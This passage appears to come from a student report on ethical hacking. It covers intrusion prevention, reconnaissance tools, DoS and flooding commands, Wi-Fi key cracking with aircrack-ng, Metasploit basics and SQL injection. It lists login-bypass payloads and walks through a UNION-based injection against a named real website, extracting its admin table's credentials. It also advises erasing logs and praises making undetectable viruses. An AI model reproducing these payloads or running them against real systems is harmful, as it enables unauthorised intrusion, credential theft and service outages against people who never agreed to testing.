threats and respond to them swiftly. Like an intrusion detection system (IDS), an intrusion
prevention system (IPS) monitors network traffic. However, because an exploit may be
carried out very quickly after the attacker gains access, intrusion prevention systems also
have the ability to take immediate action, based on a set of rules established by the network
administrator. For example, an IPS might drop a packet that it determines to be malicious
and block all further traffic from that IP address or port. Legitimate traffic, meanwhile, should
be forwarded to the recipient with no apparent disruption or delay of service.
According to Michael Reed of Top Layer Networks, an effective intrusion prevention system
should also perform more complex monitoring and analysis, such as watching and
responding to traffic patterns as well as individual packets. "Detection mechanisms can
include address matching, HTTP string and substring matching, generic pattern matching,
TCP connection analysis, packet anomaly detection, traffic anomaly detection and TCP/UDP
port matching."
Broadly speaking, an intrusion prevention system can be said to include any product or
practice used to keep attackers from gaining access to your network, such as firewalls and
anti-virus software.
36. 36
Steps of Hacking
1. Information gathering
This is a first step of hacking and penetration testing attack; first we collect all information’s
of target with help of tools and manual ways. Without much information our success rate of
attacks also low.
Manual Process:
1. Get URL using Google search.
2. Using whois sites.
37. 37
5. www.who.is
6. www.robtex.com
7. www.domaintools.com
3. Get PDF and Document using Google special features:
8. Site:4share.com CISSP
9. Site:pastebin.com inurl:hack
10. Chemistry filetype:doc
11. http://www.googleguide.com/advanced_operators_reference.html
Automated Process:
1. We use following tools for information gathering:
UberHarvest
theharvester.py
Metagoofil
Web Data Extractors (Email-Phone no Extractors)
Maltego
2. People Search:
pipl.com
anywho.com
address.com
Social networking sites (Facebook, LinkedIn, twitter)
Job Sites [ dice.com, monster.com, naukri.com]
3. Phone Number
truecaller.com
kgdetective.com
phunwa.com
4. Trace route Tools
Vtrace [ www.vtrace.pl ]
Trout [ www.foundstone.com ]
tracert , traceroute [ commands ]
5. Email IP Tracking
wspy.org
38. 38
Emailtrackerpro.com
Readnotify.com
Politemail.com
2. Scanning & Banner Grabbing
After getting information of target user, we need to know OS type, version of application
that are running on open PORTS etc. to successful exploitation
.
Following tools, we need to use:
1. Port & network scanning:
Port and networking scanning is used to know open port and active Pc in network.
Nmap
Angry IP scanner
Hping
2. Banner Grabbing:
Banner grabbing is a process to know exact version of target application to search
loopholes or exploits or zero day.
Telnet
ID serve
3. Vulnerability Scanning
This step is used to find out loopholes in applications using tools, after we use public and
private exploit to enter on target system remotely.
Vulnerability scanner:
Acunetix
Netsparke
Nessus
gfi languard
Whatweb [ Find out web application ][ Backtrack Tool ]
E.g.: ./whatweb bytec0de.com
zoomscan [ scan zoomla website ] [ /pentest/web/zoomscan ]
E.g.: ./joomscan.pl -u http://liclanka.com/
Nikto:
E.g. ./nikto.pl -host liclanka.com
Websecurifi
39. 39
Vega
w3af
webshag
After find out vulnerability we look for exploit we need to compile those using their associated
language and change shell code if required for connect back.
4. Exploitation (Obtainingaccess)
Program exploitation is a staple of hacking. A program is made up of a complex set of rules
following a certain execution flow that ultimately tells the computer what to do. Exploiting a
program is simply a clever way of getting the computer to do what you want it to do, even if
the currently running program was designed to prevent that action. Since a program can
really only do what it’s designed to do, the security holes are actually flaws or oversights in
the design of the program or the environment the program is running in. It takes a creative
mind to find these holes and to write programs that compensate for them. Sometimes these
holes are the products of relatively obvious programmer errors, but there are some less
obvious errors that have given birth to more complex exploit techniques that can be applied
in many different places.
5. Maintaining access & erasing evidence
This is post phase to maintain future access on target system. We need to deploy malware
as per our requirement else we need to erase logs and evidence or use offshore VPS for
whole operations.
40. 40
Dos & DDos Attacks
1. Dos Attack:
A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent
legitimate users of a service from using that service. Examples include
attempts to "flood" a network, thereby preventing legitimate network traffic
attempts to disrupt connections between two machines, thereby preventing
access to a service
attempts to prevent a particular individual from accessing a service
attempts to disrupt service to a specific system or person
It is an attempt to make a machine or network resource unavailable to its intended users.
Consuming all resources given to person. Like Network bandwidth, all Type of Memory etc.
1. Ping of Death
ping -t -l 6550 google.com [ max buffer size = 65500 ]
Effective system [ Solaris 2.4 , minix , win3.11,95 ]
2. SYN-ATTACK
Hping -i sudo hping3 -i u1 -S -p 80 192.168.1.1
3. UDP/HTTP/TCP Flooding
LOIC
HOIC
4. Smurf Attack
41. 41
make your own packet and flood on network
pktbuilder
packETH 1.6 (linux & windows)
5. CDP Flooding (Cisco Discovery Protocol)
yersinia [ backtrack ]
Done on Cisco Switches & Routers
6. MAC Flooding
Flooding network switches
ARP Spoofing
Net cut [ Windows ]
ettercap [ Backtrack ]
Deauthentication Technique
2. Ddos Attack
DDOS, short for Distributed Denial of Service, is a type of DOS attack where multiple
compromised systems -- which are usually infected with a Trojan – are used to target a single
system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the
end targeted system and all systems maliciously used and controlled by the hacker in the
distributed attack.
According to this report on e-Security Planet, in a DDoS attack, the incoming traffic flooding the
victim originates from many different sources – potentially hundreds of thousands or more. This
effectively makes it impossible to stop the attack simply by blocking a single IP address; plus, it
is very difficult to distinguish legitimate user traffic from attack traffic when spread across so
many points of origin.
Distribution of attack techniques: January 2013
43. 43
DDOS attacks in Q1 2019 | secure list
Wireless hacking
Wireless networks broadcast their packets using radio frequency or optical wavelengths. A
modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the
fly and persuade wireless stations to accept his packets as legitimate.
The step by step procedure in wireless hacking can be explained with help of different topics as
follows:-
i. Stations and Access Points: - A wireless network interface card (adapter) is a device,
called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations
associated with it. The AP itself is typically connected by wire to a LAN. Each AP has a
0-to-32-byte long Service Set Identifier (SSID) that is also commonly called a network
name. The SSID issued to segment the airwaves for usage.
ii. Channels: - The stations communicate with each other using radiofrequencies between
2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless
networks using neighboring channels may interfere with each other.
iii. Wired Equivalent Privacy (WEP): - It is a shared-secret key encryption system used to
encrypt packets transmitted between a station and an AP. The WEP algorithm is
intended to protect wireless communication from eavesdropping. A secondary function
of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the
payload of data packets. Management and control frames are always transmitted in the
clear. WEP uses the RC4 encryption algorithm.
44. 44
iv. Wireless Network Sniffing: - Sniffing is eavesdropping on the network. A (packet)
sniffer is a program that intercepts and decodes network traffic broadcast through a
medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help
find the easy kill as in scanning for open access points that allow anyone to connect, or
capturing the passwords used in a connection session that does not even use WEP, or
in telnet, rlogin and ftp connections.
2013
Steps for hacking Wi-Fi:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w bytecodelab mon0
aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
aircrack-ng bytecodelab.cap
SQL Injection
1. What is Sql injection attack?
A SQL Injection attack is a form of attack that comes from user input that has not been
checked to see that it is valid. The objective is to fool the database system into running
malicious code that will reveal sensitive information or otherwise compromise the server.
45. 45
SQL injection is a technique used to take advantage of non-validated input vulnerabilities
to pass SQL commands through a Web application for execution by a backend database.
Attackers take advantage of the fact that programmers often chain together SQL
commands with user-provided parameters, and can therefore embed SQL commands
inside these parameters. The result is that the attacker can execute arbitrary SQL queries
and/or commands on the backend database server through the Web application.
1. MYSQL Injection
Dorks Code
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp
I am going to use:
Code:
http://site.com/Admin_Login.asp
Logging
Now you can find some site over these dorks and try to log in with
Username: Admin
Password: password' or 1=1—
Instead of password' or 1=1 you can use some of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 –
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
46. 46
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'
Password’ or 1=1 will the confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are going to be able to use
admin panel.
2. Advance SQL Injection
Eg. Of advance SQL injection:
Target: http://www.naukriguru.com
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 100
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 10
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 20
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 50
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 40
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 30
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 35
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 33
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 32
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 31
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
47. 47
1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
8,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
4,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
4,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
4,25,26,27,28,29,30,31 from information_schema.tables where table_schema
=database()—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2
3,24,25,26,27,28,29,30,31 from information_schema.columns where table_name
=0x6e675f61646d696e—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
fromng_admin—
http://www.naukriguru.com/admin/
http://www.naukriguru.com/admin/index.php#
http://www.naukriguru.com/admin/add_industry.php
Tool used for SQL injection are:
o Havij v1.15
o Sql map
o Bsql hacker
48. 48
o Pangolin
o Absinthe
MALWARE
This is a big catchall phrase that covers all sorts of software with nasty intent. Not buggy
software, not programs you don’t like, but software which is specifically written with the intent to
harm.
Virus:
This is a specific type of malware that spreads itself once it’s initially run. It’s different from
other types of malware because it can either be like a parasite that attaches to good files on
your machine, or it can be self-contained and search out other machines to infect.
Worm:
Think of inchworms rather than tapeworms. These are not parasitic worms, but the kind that
move around on their own. In the malware sense, they’re viruses that are self-contained (they
don’t attach themselves like a parasite) and go around searching out other machines to infect.
Trojan:
Do you remember that story you had to read in high school about the big wooden horse that
turned out to be full of guys with spears? This is the computer equivalent. You run a file that
is supposed to be something fun or important, but it turns out that it’s neither fun nor
important, and it’s now doing nasty things to your machine.
49. 49
Penetration Testing
Introduction:
1. What is penetration testing?
A penetration testing is a method of evaluating the security of a computer system or a
network by simulating an attack from a malicious source, known as black hat hackers, or
crackers. The process involves an active analysis of the system from any potential
vulnerabilities that may result from poor or improper system configuration, known and/or
unknown hardware or software flaws, or operational weakness in process or technical
countermeasures.
2. Why conducta penetration testing?
From a business perspective, penetration testing helps safeguard your organization against
failure, through:
Preventing financial loss through fraud or through lost revenue due to unreliable
business system and processes.
Proving due diligence and compliance to your industry regulators, customers and
shareholders.
Protecting your brand by avoiding loss of consumer confidence and business
reputation.
3. What can be tested?
All part where organization captures, store and processes information can be assessed like
the system where the information is stored in, the transmission channels that transport it,
and the processes and personnel that manages it, Examples of areas that are commonly
tested are:
Operating system, applications, database, networking equipment’s etc.
Dynamic websites, in-house applications etc.
Telephony (war-dialing, remote access etc.)
Personnel (screening process, social engineering etc.)
Physical (access controls, dumpster diving etc.)
Wireless (Wi-Fi, Bluetooth, IR, GSM, RFID etc.)
50. 50
4. What is a process of penetrationtesting?
Penetration testing has a vulnerability assessment part also. In pen test we launch attack and in
VA (vulnerability assessment) we only test for vulnerability by automated VA tools like Nikto,
nessus, acunetix etc.
Steps of advanced penetration testing:
If we want to do pen test on any website like, www.anysite.com we need DNS Records
from robtex.com & whois records and other type of information this part is known as
Information Gathering.
After we use backtrack operating system (also known as pen-testing OS for security
experts) toolkit for auto pen-testing with help of free tools like: Nikto, Privoxy,
Nessus, Samurai etc.
Make report for all found vulnerabilities and cross verify.
Use commercial software’s like:
Core Impact, Canvas, Qualys Guard, Xcobra, NTOSpider, KSES, AppScan,
Webinspect, Brupsuite, Acunetix WVS etc.
Make report for new vulnerabilities.
After we will start manual pen-testing with help of Metasploit & Reverse eng tools.
Find vulnerabilities and take screen shots for Proof-Of-Concept create custom report.
Forward Custom Report to company.
52. 52
METASPLOIT
1. What is Metasploit?
The Metasploit project is an open-source, computer security project which provides information
about security vulnerabilities and aids in penetration testing and IDS signature development. Its
most well-known sub-project is the Metasploit framework, a tool for developing and executing
exploit code against a remote target machine. Other important sub projects include the opcode
Database, shell code archive, and security research. Metasploit is a best hacking framework for
local and remote hacking done in an easy way.
Metasploit Terms:
Exploit to take advantage of a security flaw within a system, network, or application.
Payload is code that our victim computer to execute by the Metasploit framework.
Module a small piece of code that can be added to the Metasploit framework to execute an
attack.
Shell-code a small piece of code used as a payload.
MSF console
MSF console is an all-in-one interface to most of the features in Metasploit.
MSF console can be used to launch attacks, creating listeners, and much, much more.
Metasploit comes installed by default on backtrack 5. To access MSF console, open your
console and type:
13
root@bt: ~# cd /opt/framework3/msf3/
root@bt: ~#/opt/framework3/msf3# msfconsole
After sometime, the msfconsole will boot.
Or you can directly use “msfconsole command” to open Metasploit.
53. 53
What we can do with Metasploit?
We can hack all platforms of windows, Linux, sun Solaris, AXI etc.
We can hack any remote machine by the available exploits in adobe acrobat 9.0.0.0,
8.1.1, Winamp, Realplayer, Oracle, Mozilla, IE, yahoo messenger.
We can create un-detectable VIRUS in exe, java, pdf, mp3 etc. formats.
We can sniff network traffic, and sessions for email passwords. SSL protection and data
protection.
We can install key logger on remote machine, record audio etc.
Msfconsole Commands:
1. Show Entering 'show' at the msfconsole prompt will display every module within
Metasploit. There are a number of 'show' commands you can use but the ones you will
54. 54
use most frequently are 'show auxiliary', 'show exploits', 'show payloads', 'show
encoders.
Show targets For showing target in particular exploit.
Show options Shows the various option of exploit
56. 56
Show exploits It list all exploits.
Show auxiliary it lists all auxiliary.
57. 57
2. Use When you have decided on a particular module to make use of, issue the 'use'
command to select it. The 'use' command changes your context to a specific module,
exposing type-specific commands. Notice in the output below that any global
variables that were previously set are already configured.
3. Set The 'set' command allows you to configure Framework options and parameters for
the current module you are working with.
58. 58
4. unset The opposite of the 'set' command, of course, is 'unset'. 'Unset' removes a
parameter previously configured with 'set'. You can remove all assigned
variables with 'unset all'.
59. 59
5. Back Once you have finished working with a particular module, or if you inadvertently
select the wrong module, you can issue the 'back' command to move out of the
current context. This, however is not required. Just as you can in commercial
routers, you can switch modules from within other modules. As a reminder, variables
will only carry over if they are set globally.
60. 60
6. check There aren't many exploits that support it, but there is also a 'check' option that will
check to see if a target is vulnerable to a particular exploit instead of actually
exploiting it.
7. info The 'info' command will provide detailed information about a particular module
including all options, targets, and other information. Be sure to always read the module
description prior to using it as some may have un-desired effects.
The info command also provides the following information:
The author and licensing information Vulnerability references (ie: CVE, BID, etc) Any payload
restrictions the module may have
61. 61
8. searchThe msfconsole includes an extensive regular-expression based search
functionality. If you have a general idea of what you are looking for you can search
for it via 'search '. In the output below, a search is being made for MS Bulletin MS09-
011. The search function will locate this string within the module names,
descriptions, references, etc.
9. sessions The 'sessions' command allows you to list, interact with, and kill spawned
sessions. The sessions can be shells, Meterpreter sessions, VNC, etc.
Session –l To list any active sessions
62. 62
Session –i To interact with a given session, you just need to use the '-i' switch followed by the
Id number of the session.
63. 63
Conclusion
ethical hacking is not a criminal activity and should not be considered as such. While it is true
that malicious hacking is a computer crime and criminal activity, ethical hacking is never a crime.
Ethical hacking is in line with industry regulation and organizational IT policies. Malicious hacking
should be prevented while ethical hacking which promotes research, innovation, and
technological breakthroughs should be encouraged and allowed.
The main conclusion behind the study of ethical hacking to defined that which kind of tools and
technique use by hacker to get enter in personal computer system
Its various Perspectives:
Student:
A student should understand that no software is made with zero Vulnerability. So
while they are studying they should study the various possibilities and should study
the various how to prevent that because they are the Professionals of tomorrow.
Professionals:
Professionals should understand that business is directly related to security. So they
should make new software with vulnerabilities as less as possible. if they are not aware
of these then they won’t be cautions enough in security matters.
In the preceding sections we saw the methodology of hacking, why should we aware
of hacking and tools and some tools which a hacker may use. Now we can see what
we can do against hacking or to protect ourselves from hacking.
the first thing is we should keep ourselves updated about those software's us an using
for official and reliable sources.
Educate employees and the users against black hacking.
Use every possible security measures
Every time make our password strong by making it harder and longer to be cracked.